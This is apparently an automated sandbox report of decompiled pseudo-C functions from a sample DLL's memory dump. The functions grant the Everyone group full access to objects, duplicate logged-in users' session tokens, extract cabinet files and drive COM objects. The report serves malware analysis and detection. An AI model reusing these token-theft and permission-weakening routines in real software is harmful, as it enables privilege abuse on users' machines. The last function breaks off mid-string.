Function 6ECA2000, Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 124
memoryCOMMON

Download Yara Rule

C-Code - Quality: 22%

			E6ECA2000(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12) {
				char _v40;
				char _v48;
				void* _v52;
				long _v56;
				long _v60;
				long _v64;
				long _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				char _v80;
				char _v92;
				intOrPtr _v96;
				intOrPtr _v108;
				intOrPtr _t28;
				intOrPtr _t29;
				long* _t34;
				signed int _t38;
				void* _t50;
				long _t52;
				intOrPtr _t55;

				_t28 =  *_a8;
				_t52 = 0;
				_v48 = 0;
				if(_t28 == 0) {
					_t29 = _a4;
					if(_t29 == 0) {
						goto L2;
					} else {
						_t55 = _a12;
						__imp__GetNamedSecurityInfoA(_t29, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
						if(_t29 != 0) {
							goto L2;
						} else {
							goto L5;
						}
					}
				} else {
					_t55 = _a12;
					__imp__GetSecurityInfo(_t28, _t55, 4, 0, 0,  &_v48, 0,  &_v40);
					if(_t28 == 0) {
						L5:
						_v68 = 0x44;
						_t50 = HeapAlloc(GetProcessHeap(), 8, 0x44);
						if(_t50 != 0) {
							_t34 =  &_v68;
							__imp__CreateWellKnownSid(1, 0, _t50, _t34);
							if(_t34 != 0) {
								_v76 = 1;
								_v80 = 0x10000000;
								_v72 = 3;
								_v64 = 0;
								_v68 = 0;
								_v52 = _t50;
								_v60 = 0;
								_v56 = 0;
								__imp__SetEntriesInAclA(1,  &_v80, _v96,  &_v92);
								_t38 =  *_v56;
								if(_t38 == 0) {
									_t38 = _v60;
									if(_t38 != 0) {
										__imp__SetNamedSecurityInfoA(_t38, _t55, 4, 0, 0, _v108, 0);
										goto L11;
									}
								} else {
									__imp__SetSecurityInfo(_t38, _t55, 4, 0, 0, _v108, 0);
									L11:
									asm("sbb esi, esi");
									_t52 =  ~_t38 + 1;
								}
							}
							HeapFree(GetProcessHeap(), 0, _t50);
						}
						return _t52;
					} else {
						L2:
						return 0;
					}
				}
			}

0x6eca2007
0x6eca200e
0x6eca2010
0x6eca2016
0x6eca2040
0x6eca2046
0x00000000
0x6eca2048
0x6eca2048
0x6eca205d
0x6eca2065
0x00000000
0x00000000
0x00000000
0x00000000
0x6eca2065
0x6eca2018
0x6eca2018
0x6eca202d
0x6eca2035
0x6eca2067
0x6eca206c
0x6eca2081
0x6eca2085
0x6eca208b
0x6eca2094
0x6eca209c
0x6eca20b3
0x6eca20bb
0x6eca20c3
0x6eca20cb
0x6eca20cf
0x6eca20d3
0x6eca20d7
0x6eca20db
0x6eca20df
0x6eca20e9
0x6eca20ed
0x6eca2103
0x6eca2109
0x6eca2117
0x00000000
0x6eca2117
0x6eca20ef
0x6eca20fb
0x6eca211d
0x6eca2121
0x6eca2123
0x6eca2123
0x6eca20ed
0x6eca212d
0x6eca212d
0x6eca213c
0x6eca2039
0x6eca2039
0x6eca203f
0x6eca203f
0x6eca2035

APIs

GetSecurityInfo.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6ECA202D
GetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000000,00000000,?), ref: 6ECA205D
GetProcessHeap.KERNEL32 ref: 6ECA2074
HeapAlloc.KERNEL32(00000000), ref: 6ECA207B
CreateWellKnownSid.ADVAPI32(00000001,00000000,00000000,?), ref: 6ECA2094
SetEntriesInAclA.ADVAPI32(00000001,?,?,00000044), ref: 6ECA20DF
SetSecurityInfo.ADVAPI32(00000000,?,00000004,00000000,00000000,00000044,00000000), ref: 6ECA20FB
SetNamedSecurityInfoA.ADVAPI32(?,?,00000004,00000000,00000000,00000044,00000000), ref: 6ECA2117
GetProcessHeap.KERNEL32(00000000,00000000), ref: 6ECA2126
HeapFree.KERNEL32(00000000), ref: 6ECA212D

Strings

D, xrefs: 6ECA206C

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: HeapInfoSecurity$NamedProcess$AllocCreateEntriesFreeKnownWell
String ID: D
API String ID: 1714474399-2746444292
Opcode ID: ee6da21a19ef63651c0e98d5c6e4a4738e357672dcc0ba3a1c44f07291cc548b
Instruction ID: d6584f887831cd6be6d36aae669bbb9dde9a374c1c765760d2cdecd2196d9f16
Opcode Fuzzy Hash: ee6da21a19ef63651c0e98d5c6e4a4738e357672dcc0ba3a1c44f07291cc548b
Instruction Fuzzy Hash: CB4138B1204316AFE7148F99CD98E6BBBFCEB85788F00491DFB5187140E675DC048B62

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA12C0, Relevance: 18.1, APIs: 12, Instructions: 96
filestringCOMMON

Download Yara Rule

C-Code - Quality: 50%

			E6ECA12C0(char* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v264;
				char _v288;
				char _v300;
				intOrPtr _v304;
				char _v308;
				long _v312;
				char* _t18;
				void* _t20;
				char* _t28;
				char* _t32;
				char* _t40;
				void* _t42;
				intOrPtr _t43;
				long* _t48;

				_t18 =  &_v300;
				_push(_t18);
				_push(0xffffffff);
				_push(E6ECA10E0);
				_push(E6ECA10D0);
				_push(E6ECA10A0);
				_push(E6ECA1070);
				_push(E6ECA1000);
				_push(E6ECA1050);
				_push(E6ECA1030);
				_v312 = 0;
				L6ECAC3A2();
				_t40 = _t18;
				_t48 =  &(( &_v312)[9]);
				if(_t40 == 0) {
					return 0;
				} else {
					_t32 = _a4;
					_t20 = CreateFileA(_t32, 0xc0000000, 3, 0, 3, 0x80, 0);
					_t42 = _t20;
					if(_t42 != 0xffffffff) {
						_push( &_v288);
						_push(_t42);
						_push(_t40);
						L6ECAC39C();
						_t48 =  &(_t48[3]);
						CloseHandle(_t42);
						if(_t20 != 0) {
							_t43 = _a12;
							if(_t43 != 0) {
								_v312 = GetTickCount();
								 *0x6ecb0270 = RtlRandom( &_v312);
							}
							lstrcpyA( &_v264, _t32);
							PathRemoveFileSpecA( &_v264);
							PathAddBackslashA( &_v264);
							_push( &_v308);
							_push(0);
							_push(E6ECA1100);
							_push(0);
							_push( &_v264);
							_v304 = _a8;
							_v308 = _t43;
							_t28 = PathFindFileNameA(_t32);
							_push(_t28);
							_push(_t40);
							L6ECAC396();
							_t48 =  &(_t48[7]);
							_v312 = _t28;
						}
					}
					_push(_t40);
					L6ECAC390();
					return _v312;
				}
			}

0x6eca12c8
0x6eca12cc
0x6eca12cd
0x6eca12cf
0x6eca12d4
0x6eca12d9
0x6eca12de
0x6eca12e3
0x6eca12e8
0x6eca12ef
0x6eca12f4
0x6eca12f8
0x6eca12fd
0x6eca12ff
0x6eca1304
0x6eca13f1
0x6eca130a
0x6eca130b
0x6eca1323
0x6eca1329
0x6eca132e
0x6eca1339
0x6eca133a
0x6eca133b
0x6eca133c
0x6eca1341
0x6eca1347
0x6eca1350
0x6eca1352
0x6eca135b
0x6eca1368
0x6eca1372
0x6eca1372
0x6eca137d
0x6eca1388
0x6eca1393
0x6eca13a4
0x6eca13a5
0x6eca13a7
0x6eca13ac
0x6eca13b2
0x6eca13b4
0x6eca13b8
0x6eca13bc
0x6eca13c2
0x6eca13c3
0x6eca13c4
0x6eca13c9
0x6eca13cc
0x6eca13cc
0x6eca1350
0x6eca13d0
0x6eca13d1
0x6eca13e6
0x6eca13e6

APIs

#20.CABINET(Function_00001030,Function_00001050,Function_00001000,Function_00001070,Function_000010A0,Function_000010D0,Function_000010E0,000000FF,?), ref: 6ECA12F8
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 6ECA1323
#21.CABINET(00000000,00000000,?), ref: 6ECA133C
CloseHandle.KERNEL32(00000000), ref: 6ECA1347
GetTickCount.KERNEL32 ref: 6ECA135D
RtlRandom.NTDLL(?), ref: 6ECA136C
lstrcpyA.KERNEL32(?,?), ref: 6ECA137D
PathRemoveFileSpecA.SHLWAPI(?), ref: 6ECA1388
PathAddBackslashA.SHLWAPI(?), ref: 6ECA1393
PathFindFileNameA.SHLWAPI(?,?,00000000,Function_00001100,00000000,?), ref: 6ECA13BC
#22.CABINET(00000000,00000000), ref: 6ECA13C4
#23.CABINET(00000000), ref: 6ECA13D1

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePath$BackslashCloseCountCreateFindHandleNameRandomRemoveSpecTicklstrcpy
String ID:
API String ID: 4034828233-0
Opcode ID: 8286aa1da5d7bae3d49178d387e313f54b381b126331a908b86af69f2a44ba6e
Instruction ID: 5dcbd95c06e15feb8a09b3b09028ae167ec8abb9c431b73c1989511e5c290f38
Opcode Fuzzy Hash: 8286aa1da5d7bae3d49178d387e313f54b381b126331a908b86af69f2a44ba6e
Instruction Fuzzy Hash: 3D31C2B54053026FC710DBACDC44FEFBBB8AB85765F004A19FA6997380F77095098B92

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA4760, Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 250
memorycomstringCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E6ECA4760() {
				char _v8;
				char _v12;
				char _v16;
				char _v24;
				intOrPtr _v28;
				signed int _v32;
				char _v36;
				void* _v44;
				intOrPtr _v48;
				void* _v52;
				intOrPtr _v60;
				char _v64;
				intOrPtr* _v68;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				WCHAR* _v92;
				intOrPtr* _v104;
				intOrPtr* _v112;
				intOrPtr* _v120;
				intOrPtr* _v128;
				intOrPtr* _v136;
				intOrPtr* _v144;
				intOrPtr* _v148;
				intOrPtr _v152;
				intOrPtr* _v160;
				char* _t80;
				intOrPtr* _t82;
				intOrPtr* _t85;
				intOrPtr* _t88;
				intOrPtr* _t92;
				intOrPtr* _t95;
				char* _t98;
				intOrPtr _t99;
				intOrPtr* _t100;
				intOrPtr* _t102;
				intOrPtr* _t104;
				intOrPtr* _t106;
				intOrPtr* _t108;
				intOrPtr* _t110;
				intOrPtr* _t112;
				intOrPtr* _t115;
				intOrPtr* _t117;
				intOrPtr* _t120;
				int _t123;
				intOrPtr* _t124;
				intOrPtr* _t126;
				WCHAR* _t128;
				intOrPtr* _t130;
				intOrPtr* _t132;
				signed int _t134;
				intOrPtr* _t138;
				intOrPtr* _t161;
				char _t185;
				void* _t186;
				char _t189;
				char _t190;
				signed int* _t191;
				WCHAR* _t194;

				_t80 =  &_v16;
				_t185 = 0;
				_v12 = 0;
				_v8 = 0;
				_v16 = 0;
				__imp__CoCreateInstance(0x6ecae0bc, 0, 1, 0x6ecae07c, _t80);
				if(_t80 < 0) {
					L35:
					return _v32;
				}
				_t82 = _v36;
				_v24 = 0;
				_push( &_v24);
				_push(_t82);
				if( *((intOrPtr*)( *((intOrPtr*)( *_t82 + 0x1c))))() < 0) {
					L10:
					_t85 = _v44;
					_v52 = _t185;
					_push( &_v52);
					_push(_t85);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t85 + 0x48))))() < 0) {
						L34:
						_t88 = _v52;
						 *((intOrPtr*)( *((intOrPtr*)( *_t88 + 8))))(_t88);
						if(_v48 != _t185) {
							return 1;
						}
						goto L35;
					}
					_t138 = __imp__#2;
					_t194 =  *_t138(_v28);
					if(_t194 == _t185) {
						L33:
						_t92 = _v64;
						 *((intOrPtr*)( *((intOrPtr*)( *_t92 + 8))))(_t92);
						goto L34;
					}
					_t186 =  *_t138(_v28);
					_t189 = 0;
					if(_t186 == 0) {
						L32:
						__imp__#6(_t194);
						_t185 = 0;
						goto L33;
					}
					_t95 = _v68;
					_push( &_v64);
					_v64 = 0;
					_push(_t186);
					_push(_t95);
					if( *((intOrPtr*)( *((intOrPtr*)( *_t95 + 0x28))))() < 0) {
						L21:
						if(_v52 != _t189) {
							_t98 =  &_v84;
							_v84 = _t189;
							__imp__CoCreateInstance(0x6ecae09c, _t189, 1, 0x6ecae06c, _t98);
							if(_t98 >= 0) {
								_t99 = _v60;
								if(_t99 != 0) {
									_t189 =  *_t138(_t99);
								}
								_t100 = _v104;
								 *((intOrPtr*)( *((intOrPtr*)( *_t100 + 0x30))))(_t100, _t194);
								_t102 = _v112;
								 *((intOrPtr*)( *((intOrPtr*)( *_t102 + 0x20))))(_t102, _t186);
								if(_t189 != 0) {
									_t117 = _v120;
									 *((intOrPtr*)( *((intOrPtr*)( *_t117 + 0x28))))(_t117, _t189);
								}
								_t104 = _v120;
								 *((intOrPtr*)( *((intOrPtr*)( *_t104 + 0x40))))(_t104, 0x100);
								_t106 = _v128;
								 *((intOrPtr*)( *((intOrPtr*)( *_t106 + 0x98))))(_t106, 0x7fffffff);
								_t108 = _v136;
								 *((intOrPtr*)( *((intOrPtr*)( *_t108 + 0xa8))))(_t108, 1);
								_t110 = _v144;
								 *((intOrPtr*)( *((intOrPtr*)( *_t110 + 0x88))))(_t110, 0xffffffff);
								_t112 = _v148;
								_push(_v152);
								_push(_t112);
								if( *((intOrPtr*)( *((intOrPtr*)( *_t112 + 0x20))))() >= 0) {
									_v144 = 1;
								}
								_t115 = _v160;
								 *((intOrPtr*)( *((intOrPtr*)( *_t115 + 8))))(_t115);
								if(_t189 != 0) {
									__imp__#6(_t189);
								}
							}
						}
						L31:
						__imp__#6(_t186);
						goto L32;
					}
					_t120 = _v76;
					_v84 = 0;
					 *((intOrPtr*)( *((intOrPtr*)( *_t120 + 0x2c))))(_t120,  &_v84);
					_t123 = lstrcmpiW(_t194, _v92);
					_t190 = _v44;
					if(_t123 == 0) {
						if(_t190 == 0) {
							_t130 = _v84;
							_v76 = _t190;
							 *((intOrPtr*)( *((intOrPtr*)( *_t130 + 0x84))))(_t130,  &_v76);
							if(_v84 == _t190) {
								_t132 = _v92;
								 *((intOrPtr*)( *((intOrPtr*)( *_t132 + 0x88))))(_t132, 0xffffffff);
							}
						}
						_v76 = 1;
					}
					_t124 = _v84;
					 *((intOrPtr*)( *((intOrPtr*)( *_t124 + 8))))(_t124);
					if(_v80 != 0) {
						if(_t190 != 0) {
							_t126 = _v92;
							 *((intOrPtr*)( *((intOrPtr*)( *_t126 + 0x24))))(_t126, _t186);
						}
						goto L31;
					} else {
						_t128 = _v92;
						 *((intOrPtr*)( *((intOrPtr*)( *_t128 + 0x24))))(_t128, _t186);
						_t189 = 0;
						goto L21;
					}
				} else {
					_t191 = 0x6ecad820;
					do {
						_t134 =  *_t191;
						if((_v32 & _t134) == 0) {
							goto L7;
						}
						_t161 = _v44;
						_push( &_v36);
						_v36 = _t185;
						_push(_t134);
						_push(_t161);
						if( *((intOrPtr*)( *((intOrPtr*)( *_t161 + 0x20))))() < 0 || _v48 != _t185) {
							_v48 = _t185;
							goto L10;
						} else {
							_v48 = 1;
						}
						L7:
						_t191 =  &(_t191[1]);
					} while (_t191 < "\"%s\" f");
					goto L10;
				}
			}

0x6eca4765
0x6eca476f
0x6eca477d
0x6eca4781
0x6eca4785
0x6eca4789
0x6eca4791
0x6eca49fb
0x00000000
0x6eca49fb
0x6eca4797
0x6eca47a1
0x6eca47a7
0x6eca47a8
0x6eca47b0
0x6eca47f5
0x6eca47f5
0x6eca47fd
0x6eca4803
0x6eca4804
0x6eca480c
0x6eca49e2
0x6eca49e2
0x6eca49ec
0x6eca49f9
0x6eca4a04
0x6eca4a04
0x00000000
0x6eca49f9
0x6eca4816
0x6eca481f
0x6eca4823
0x6eca49d6
0x6eca49d6
0x6eca49e0
0x00000000
0x6eca49e0
0x6eca4830
0x6eca4832
0x6eca4836
0x6eca49cd
0x6eca49ce
0x6eca49d4
0x00000000
0x6eca49d4
0x6eca483c
0x6eca4844
0x6eca4845
0x6eca484b
0x6eca484c
0x6eca4854
0x6eca48e5
0x6eca48e9
0x6eca48ef
0x6eca4901
0x6eca4905
0x6eca490d
0x6eca4913
0x6eca4919
0x6eca491e
0x6eca491e
0x6eca4920
0x6eca492b
0x6eca492d
0x6eca4938
0x6eca493c
0x6eca493e
0x6eca4949
0x6eca4949
0x6eca494b
0x6eca495a
0x6eca495c
0x6eca496e
0x6eca4970
0x6eca497f
0x6eca4981
0x6eca4990
0x6eca4992
0x6eca499c
0x6eca499d
0x6eca49a5
0x6eca49a7
0x6eca49a7
0x6eca49af
0x6eca49b9
0x6eca49bd
0x6eca49c0
0x6eca49c0
0x6eca49bd
0x6eca490d
0x6eca49c6
0x6eca49c7
0x00000000
0x6eca49c7
0x6eca485a
0x6eca4862
0x6eca486d
0x6eca4875
0x6eca487b
0x6eca4881
0x6eca4885
0x6eca4887
0x6eca488f
0x6eca489d
0x6eca48a4
0x6eca48a6
0x6eca48b5
0x6eca48b5
0x6eca48a4
0x6eca48b7
0x6eca48b7
0x6eca48bf
0x6eca48c9
0x6eca48d0
0x6eca4a07
0x6eca4a09
0x6eca4a14
0x6eca4a14
0x00000000
0x6eca48d6
0x6eca48d6
0x6eca48e1
0x6eca48e3
0x00000000
0x6eca48e3
0x6eca47b2
0x6eca47b2
0x6eca47b7
0x6eca47b7
0x6eca47bd
0x00000000
0x00000000
0x6eca47bf
0x6eca47c7
0x6eca47c8
0x6eca47ce
0x6eca47d2
0x6eca47d7
0x6eca47f1
0x00000000
0x6eca47e0
0x6eca47e0
0x6eca47e0
0x6eca47e4
0x6eca47e4
0x6eca47e7
0x00000000
0x6eca47b7

APIs

CoCreateInstance.OLE32(6ECAE0BC,00000000,00000001,6ECAE07C,?), ref: 6ECA4789
SysAllocString.OLEAUT32(?), ref: 6ECA481D
SysAllocString.OLEAUT32(?), ref: 6ECA482E
lstrcmpiW.KERNEL32(00000000,?), ref: 6ECA4875
CoCreateInstance.OLE32(6ECAE09C,00000000,00000001,6ECAE06C,?), ref: 6ECA4905
SysAllocString.OLEAUT32(?), ref: 6ECA491C
SysFreeString.OLEAUT32(00000000), ref: 6ECA49C0
SysFreeString.OLEAUT32(00000000), ref: 6ECA49C7
SysFreeString.OLEAUT32(00000000), ref: 6ECA49CE

Strings

"%s" f, xrefs: 6ECA47E7

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: String$AllocFree$CreateInstance$lstrcmpi
String ID: "%s" f
API String ID: 1501015606-2173819097
Opcode ID: 699d21780a74539649f8d449b82a608bf5936c12e38e64c0596b1243c17d53c0
Instruction ID: 3ec5ac6e77019d9a85b7e66751fb3d00d2a8eaff7f7e9087a7005136bf639b50
Opcode Fuzzy Hash: 699d21780a74539649f8d449b82a608bf5936c12e38e64c0596b1243c17d53c0
Instruction Fuzzy Hash: 999106756047029FC610DFA9C880D5BB7E9BFC9704F104A5CFA999B354EB31E846CBA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECA34B0, Relevance: 16.6, APIs: 11, Instructions: 134
sleepCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E6ECA34B0() {
				void* _t32;
				void* _t33;
				void* _t35;
				void* _t53;
				void* _t55;
				void* _t58;
				void* _t59;
				void* _t61;
				void* _t64;
				void* _t65;

				_t59 =  *(_t65 + 0x20);
				 *(_t65 + 0x10) = 0;
				_t64 = 0;
				do {
					 *(_t65 + 0x20) = 0;
					 *(_t65 + 0x14) = 0;
					if(_t59 != 0xffffffff) {
						_push(_t65 + 0x14);
						_t32 = _t65 + 0x24;
						_push(_t32);
						_push(8);
						_push(_t59);
						_push(0);
						L6ECAC36C();
						if(_t32 == 0) {
							goto L14;
						} else {
							_t35 =  *(_t65 + 0x20);
							if( *_t35 == 0) {
								 *(_t65 + 0x10) = 1;
							}
							_push(_t35);
							goto L13;
						}
					} else {
						_t33 = _t65 + 0x14;
						_push(_t33);
						_push(_t65 + 0x24);
						_push(1);
						_push(0);
						_push(0);
						L6ECAC372();
						if(_t33 == 0) {
							goto L14;
						} else {
							_t55 =  *(_t65 + 0x14);
							_t61 =  *(_t65 + 0x20);
							_t53 = 0;
							_t35 = _t61;
							if(_t55 <= 0) {
								L8:
								_push(_t61);
							} else {
								while( *((intOrPtr*)(_t35 + 8)) != 0) {
									_t53 = _t53 + 1;
									_t35 = _t35 + 0xc;
									if(_t53 < _t55) {
										continue;
									} else {
										_push(_t61);
									}
									goto L13;
								}
								_t59 =  *_t35;
								 *(_t65 + 0x10) = 1;
								goto L8;
							}
							L13:
							L6ECAC366();
							if( *(_t65 + 0x10) != 0) {
								_push(_t65 + 0x14);
								_push(_t59);
								 *((intOrPtr*)(_t65 + 0x1c)) = 0;
								L6ECAC360();
								if(_t35 == 0) {
									break;
								} else {
									 *((intOrPtr*)(_t65 + 0x38)) = 0;
									if(DuplicateTokenEx( *(_t65 + 0x14), 0x2000000, 0, 1, 1, _t65 + 0x20) == 0) {
										break;
									} else {
										_push(4);
										_push(_t65 + 0x14);
										 *(_t65 + 0x20) = 0;
										L6ECAC2EE();
										if(GetTokenInformation( *(_t65 + 0x20), 0x13, _t65 + 0x18, 4, _t65 + 0x18) != 0) {
											CloseHandle( *(_t65 + 0x20));
											CloseHandle( *(_t65 + 0x14));
											return  *(_t65 + 0x10);
										} else {
											_t58 =  *(_t65 + 0x20);
											 *(_t65 + 0x14) = _t58;
											CloseHandle( *(_t65 + 0x14));
											return _t58;
										}
									}
								}
							} else {
								goto L14;
							}
						}
					}
					L21:
					L14:
					Sleep(0x1f4);
					_t64 = _t64 + 1;
				} while (_t64 < 0x78);
				return 0;
				goto L21;
			}

0x6eca34b9
0x6eca34bd
0x6eca34c1
0x6eca34c3
0x6eca34c3
0x6eca34c7
0x6eca34ce
0x6eca3518
0x6eca3519
0x6eca351d
0x6eca351e
0x6eca3520
0x6eca3521
0x6eca3522
0x6eca3529
0x00000000
0x6eca352b
0x6eca352b
0x6eca3531
0x6eca3533
0x6eca3533
0x6eca353b
0x00000000
0x6eca353b
0x6eca34d0
0x6eca34d0
0x6eca34d4
0x6eca34d9
0x6eca34da
0x6eca34dc
0x6eca34dd
0x6eca34de
0x6eca34e5
0x00000000
0x6eca34e7
0x6eca34e7
0x6eca34eb
0x6eca34ef
0x6eca34f1
0x6eca34f5
0x6eca3511
0x6eca3511
0x6eca34f7
0x6eca34f7
0x6eca34fc
0x6eca34fd
0x6eca3502
0x00000000
0x6eca3504
0x6eca3504
0x6eca3504
0x00000000
0x6eca3502
0x6eca3507
0x6eca3509
0x00000000
0x6eca3509
0x6eca353c
0x6eca353c
0x6eca3545
0x6eca356a
0x6eca356b
0x6eca356c
0x6eca3570
0x6eca3577
0x00000000
0x6eca3579
0x6eca358d
0x6eca3599
0x00000000
0x6eca359b
0x6eca359b
0x6eca35a1
0x6eca35a2
0x6eca35a6
0x6eca35cc
0x6eca35ee
0x6eca35f9
0x6eca3604
0x6eca35ce
0x6eca35ce
0x6eca35d7
0x6eca35dd
0x6eca35e8
0x6eca35e8
0x6eca35cc
0x6eca3599
0x00000000
0x00000000
0x00000000
0x6eca3545
0x6eca34e5
0x00000000
0x6eca3547
0x6eca354c
0x6eca3552
0x6eca3553
0x6eca3565
0x00000000

APIs

WTSEnumerateSessionsA.WTSAPI32(00000000,00000000,00000001,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA34DE
WTSQuerySessionInformationA.WTSAPI32(00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA3522
WTSFreeMemory.WTSAPI32(?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA353C
Sleep.KERNEL32(000001F4,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA354C
WTSQueryUserToken.WTSAPI32(?,?,?,00000000,?,00000008,?,?,00000000,76D24F20,00000000,?,?,00000000,76D24F20), ref: 6ECA3570
DuplicateTokenEx.ADVAPI32(?,02000000,00000000,00000001,00000001,?,?,?,?,00000000,?,00000008,?,?,00000000,76D24F20), ref: 6ECA3591
RtlZeroMemory.NTDLL(?,00000004), ref: 6ECA35A6
GetTokenInformation.ADVAPI32(?,00000013(TokenIntegrityLevel),?,00000004,?,?,?,00000000,76D24F20), ref: 6ECA35BE
CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35DD
CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35EE
CloseHandle.KERNEL32(?,?,?,00000000,76D24F20), ref: 6ECA35F9

Memory Dump Source

Source File: 00000003.00000002.250028802.000000006ECA1000.00000020.00020000.sdmp, Offset: 6ECA0000, based on PE: true

Associated: 00000003.00000002.250021245.000000006ECA0000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250046290.000000006ECAD000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.250057027.000000006ECB0000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.250075308.000000006ECB1000.00000002.00020000.sdmp Download File

Similarity

API ID: CloseHandleToken$InformationMemoryQuery$DuplicateEnumerateFreeSessionSessionsSleepUserZero
String ID:
API String ID: 935900411-0
Opcode ID: 804ae7cbdb969b8b10d99112f8d6eba4ac4a725412c9c7118854d71588c3239f
Instruction ID: 7dc2e3a31fb2f312b8238b17dc4d6b0c5ab4338883792b415c094aeb1181f8da
Opcode Fuzzy Hash: 804ae7cbdb969b8b10d99112f8d6eba4ac4a725412c9c7118854d71588c3239f
Instruction Fuzzy Hash: 0B415F712083069BD700DF9DD994AAFB7E9FBC4B14F004A2DFA95A7140E774D9098BA2

Uniqueness

Uniqueness Score: -1.00%

Function 6ECABBBE, Relevance: 16.6, APIs: 11, Instructions: 124
sleepCOMMON

Download Yara Rule

C-Code - Quality: 56%

			E6ECABBBE(intOrPtr _a4, long _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t12;
				void* _t13;
				void* _t14;
				void* _t16;
				long _t20;
				void* _t22;
				long _t24;
				void* _t26;
				long _t36;
				signed int _t38;
				void* _t39;
				char _t43;

				if(_a8 != 0) {
					__eflags = _a8 - 1;
					if(_a8 != 1) {
						L33:
						return 1;
					}
					_t24 =  *( *[fs:0x18] + 4);
					_a8 = 0;
					_push(0);
					while(1) {
						_t12 = InterlockedCompareExchange(0x6ecb0964, _t24, ??);
						__eflags = _t12;
						if(_t12 == 0) {
							break;
						}
						__eflags = _t12 - _t24;
						if(_t12 == _t24) {
							_a8 = 1;
							L11:
							_t13 =  *0x6ecb0960; // 0x0
							_t36 = 2;
							__eflags = _t13;
							if(_t13 == 0) {
								 *0x6ecb0960 = 1;
								_t14 = E6ECABB78(0x6ecad47c, 0x6ecad484);
								__eflags = _t14;
								if(_t14 != 0) {
									L3:
									return 0;
								}
								_push(0x6ecad478);
								_push(0x6ecad474);
								L6ECAC0B0();
								 *0x6ecb0960 = _t36;
								L15:
								__eflags = _a8;
								if(_a8 == 0) {
									InterlockedExchange(0x6ecb0964, 0);
								}
								__eflags =  *0x6ecb0974; // 0x0
								if(__eflags != 0) {
									_push(0x6ecb0974);
									_t16 = E6ECAC044(0, _t36, 0x6ecb0964, __eflags);
									__eflags = _t16;
									if(_t16 != 0) {
										 *0x6ecb0974(_a4, _t36, _a12);
									}
								}
								"mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            processorArchitecture=\"x86\"\r\n            publicKeyToken=\"6595b64144ccf1df\"\r\n            language=\"*\"\r\n        />\r\n    </dependentAssembly>\r\n</dependency>\r\n</assembly>PAD" = "mlns=\"urn:schemas-microsoft-com:asm.v1\" manifestVersion=\"1.0\">\r\n  <trustInfo xmlns=\"urn:schemas-microsoft-com:asm.v3\">\r\n    <security>\r\n      <requestedPrivileges>\r\n        <requestedExecutionLevel level=\"asInvoker\" uiAccess=\"false\"></requestedExecutionLevel>\r\n      </requestedPrivileges>\r\n    </security>\r\n  </trustInfo>\r\n<assemblyIdentity type=\"win32\" name=\"Microsoft.Windows.Common-Controls\" version=\"6.0.0.0\" processorArchitecture=\"x86\" />\r\n<dependency>\r\n    <dependentAssembly>\r\n        <assemblyIdentity\r\n            type=\"win32\"\r\n            name=\"Microsoft.Windows.Common-Controls\"\r\n            version=\"6.0.0.0\"\r\n            